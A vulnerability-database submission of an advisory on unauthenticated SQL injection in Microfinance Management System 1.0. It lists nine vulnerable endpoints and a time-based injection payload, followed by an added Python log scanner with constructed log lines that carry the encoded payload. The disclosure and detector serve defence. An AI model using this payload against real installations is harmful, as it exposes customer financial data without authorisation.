Submission #33221: Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated) - Info

Title: Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated)
Description:

# Exploit Title: Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated)
# Date: 23/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Version: 1.0
# Tested on: Linux

Title:
================
Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated)

Summary:
================
Microfinance Management System version 1.0 is affected by a vulnerability that allows an attacker to query the database. Due to the lack of SQL sanitization and the lack of session verification to see if an administrative user is accessing the application, the attacker is able to gain access to the database.

Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Affected Product:
================
Microfinance Management System v1.0

Steps to Reproduce:
================
All these endpoints are vulnerable to SQL injection:

/mims/pdf_singlecustomer_type.php?customer_type_number=1
/mims/updateaccount.php?account_number=1
/mims/updatecustomer.php?customer_number=1
/mims/update_customertype.php?customer_type_number=1
/mims/updateaccount_type.php?account_type_number=1
/mims/pdf_singleaccount_status.php?account_status_number=1
/mims/pdfaccount.php?account_number=1
/mims/pdf_singleaccount_type.php?account_type_number=1
/mims/pdf_singlecustomer.php?customer_number=1

Payload used:

' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc
Source: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
User: mrempy (UID 24379)
Submitted: 2022-03-23 03:55 PM (4 years ago)
Moderation: 2022-03-24 01:25 AM (10 hours later)
Status: Accepted
VulDB entry: 195642 [Microfinance Management System SQL injection]
Points: 20
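
Added example (not part of the original submission or the product's code): a Python check that scans web server access logs for requests to the nine endpoints listed in the advisory whose identifier parameter is not a plain integer or carries a time-based SQL function. It assumes combined-format access logs and that these identifiers are plain integers, as in the advisory's `=1` examples; the log lines and the `/other/page.php` path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint -> parameter pairs, taken from the advisory's list.
ENDPOINTS = {
    "/mims/pdf_singlecustomer_type.php": "customer_type_number",
    "/mims/updateaccount.php": "account_number",
    "/mims/updatecustomer.php": "customer_number",
    "/mims/update_customertype.php": "customer_type_number",
    "/mims/updateaccount_type.php": "account_type_number",
    "/mims/pdf_singleaccount_status.php": "account_status_number",
    "/mims/pdfaccount.php": "account_number",
    "/mims/pdf_singleaccount_type.php": "account_type_number",
    "/mims/pdf_singlecustomer.php": "customer_number",
}
# Client, request target and status from a combined-format line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
TIME_BASED = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)

def classify(line):
    """Return (client, path, reason) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, _status = m.groups()
    url = urlsplit(target)
    param = ENDPOINTS.get(url.path)
    if param is None:
        return None
    # parse_qs percent-decodes values, so encoded quotes are seen as quotes.
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        if TIME_BASED.search(value):
            return (client, url.path, "time-based SQLi pattern")
        if not (value.isascii() and value.isdigit()):  # assumption: integer ids
            return (client, url.path, "non-numeric identifier")
    return None

# Constructed sample log lines (not real traffic).
SAMPLE = [
    '192.0.2.10 - - [23/Mar/2022:15:55:01 +0000] "GET /mims/updatecustomer.php?customer_number=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Mar/2022:15:55:09 +0000] "GET /mims/pdfaccount.php?account_number=1%27%20and%20(select%20*%20from(select(sleep(10)))Avx)%20and%20%27abc%27%20=%20%27abc HTTP/1.1" 200 812',
    '198.51.100.7 - - [23/Mar/2022:15:56:30 +0000] "GET /mims/updateaccount.php?account_number=1%27 HTTP/1.1" 500 0',
    '192.0.2.10 - - [23/Mar/2022:15:57:00 +0000] "GET /other/page.php?q=sleep( HTTP/1.1" 200 900',
]

def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

Because the advisory notes these pages are reachable without a session, hits from clients that never authenticated are the ones to triage first.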
